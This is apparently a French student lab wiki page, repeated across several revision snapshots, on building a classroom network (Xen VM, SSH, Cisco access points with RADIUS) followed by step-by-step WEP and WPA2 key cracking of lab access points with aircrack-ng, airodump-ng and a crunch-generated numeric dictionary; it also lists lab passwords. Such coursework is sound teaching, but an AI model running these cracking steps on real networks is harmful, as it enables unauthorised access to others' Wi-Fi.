interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

TP sysres IMA2a5 2019/2020 G6

2019-11-18T16:48:11Z

Jcabrald : /* Configuration des points d'accès Wi-Fi */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau17112018.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root vers "glopglop', utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Configuration des points d'accès Wi-Fi==

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1/ Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2/ Se mettre en mode previligié :

enable
Password = "Cisco"

3/ Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4/ Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5/ On crée un server radius pour un utilisateur :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6/ On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7/ Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8/ Ensuite, on defini le login et le groupe server que l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9/ On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10/ Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme on a plusieurs utilisateurs, il faut creer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11 / Créer une sous-interface pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12/ Créer une sous-interface gigabite pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13/ Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14/ rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

TP sysres IMA2a5 2019/2020 G6

2019-11-13T12:32:32Z

Jcabrald : /* Configuration des points d'accès */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau17112018.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root vers "glopglop', utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Configuration des points d'accès Wi-Fi==

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1/ Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2/ Se mettre en mode previligié :

enable
Password = "Cisco"

3/ Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 4 à 10, sont à faire pour chaque groupe de la promo.

4/ Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5/ On cree un server radius pour un utilisateur :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6/ On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7/ Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8/ Ensuite, on defini le login et le groupe server que l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9/ On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10/ Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme on a plusieurs utilisateurs, il faut creer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11 / Créer une sous-interface pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12/ Créer une sous-interface gigabite pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13/ Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14/ rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

TP sysres IMA2a5 2019/2020 G6

2019-11-13T12:31:50Z

Jcabrald : /* Configuration des points d'accès */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau17112018.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root vers "glopglop', utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Configuration des points d'accès ==

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1/ Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2/ Se mettre en mode previligié :

enable
Password = "Cisco"

3/ Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 4 à 10, sont à faire pour chaque groupe de la promo.

4/ Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5/ On cree un server radius pour un utilisateur :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6/ On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7/ Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8/ Ensuite, on defini le login et le groupe server que l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9/ On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10/ Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme on a plusieurs utilisateurs, il faut creer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11 / Créer une sous-interface pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12/ Créer une sous-interface gigabite pour chaque utilisateur, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13/ Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14/ rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

